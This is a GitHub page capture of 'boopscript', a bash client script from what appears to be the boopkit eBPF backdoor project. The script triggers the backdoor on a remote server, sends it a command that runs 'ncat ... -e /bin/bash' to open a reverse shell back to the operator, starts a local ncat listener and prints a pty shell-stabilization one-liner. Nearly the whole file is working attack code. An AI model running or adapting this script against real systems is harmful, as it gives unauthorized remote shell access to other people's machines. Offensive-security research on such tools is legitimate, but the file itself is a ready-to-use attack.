-
Notifications
You must be signed in to change notification settings - Fork 172
/
boopscript
executable file
·94 lines (84 loc) · 2.81 KB
/
boopscript
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
#!/bin/bash
# Copyright © 2022 Kris Nóva <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ███╗ ██╗ ██████╗ ██╗ ██╗ █████╗
# ████╗ ██║██╔═████╗██║ ██║██╔══██╗
# ██╔██╗ ██║██║██╔██║██║ ██║███████║
# ██║╚██╗██║████╔╝██║╚██╗ ██╔╝██╔══██║
# ██║ ╚████║╚██████╔╝ ╚████╔╝ ██║ ██║
# ╚═╝ ╚═══╝ ╚═════╝ ╚═══╝ ╚═╝ ╚═╝
# [Remote address]
#
# This is the boopscript (public) address of
# the server running boopkit.
RHOST=${RHOST:-"127.0.0.1"}
RPORT=${RPORT:-"22"}
# [Local address]
#
# This is the local (public) address of
# the machine that boopkit will call back to.
#
# Boopkit hard-codes port "3535" for the callback!
LHOST=${LHOST:-"127.0.0.1"}
LPORT=${LPORT:-"3535"}
# SINGLE_SYN will run the boopkit-boop client
# in payload only mode. This means we will
# try to attach our RCE as a payload in a single
# SYN packet!
SINGLE_SYN=0
# [Reverse shell]
#
# Use netcat to listen locally for a shell.
NCAT="/usr/bin/ncat"
# After we have sent our command back over boopkit's
# protocol on 3535 we need a 2nd port to listen against.
NCATLISTENPORT="3545"
# Remote Command Execution
#
# The command to run on the server!
# ================================================
RCE=${RCE:-"ncat ${LHOST} ${NCATLISTENPORT} -e /bin/bash &"}
# ================================================
# Trigger is used to fire the eBPF probe on the server.
trigger(){
sleep 1
boopkit-boop \
-lhost $LHOST \
-lport $LPORT \
-rhost $RHOST \
-rport $RPORT \
-c "$RCE" ${P}
}
# Check for permissions to host a local socket.
if [ "$EUID" -ne 0 ]; then
echo "Permission denied."
exit
fi
P=""
if [ "$SINGLE_SYN" -ne 0 ]; then
P="-p"
fi
# Right away trigger the backdoor on the server
trigger &
# Also begin listening for the return RCE
#
# Note: this is only required if you are performing
# a reverse shell!
#
# Remind the user of how to use shell stabilization
echo ""
echo "python -c \"import pty; pty.spawn('/bin/bash')\""
echo ""
${NCAT} -lvp ${NCATLISTENPORT}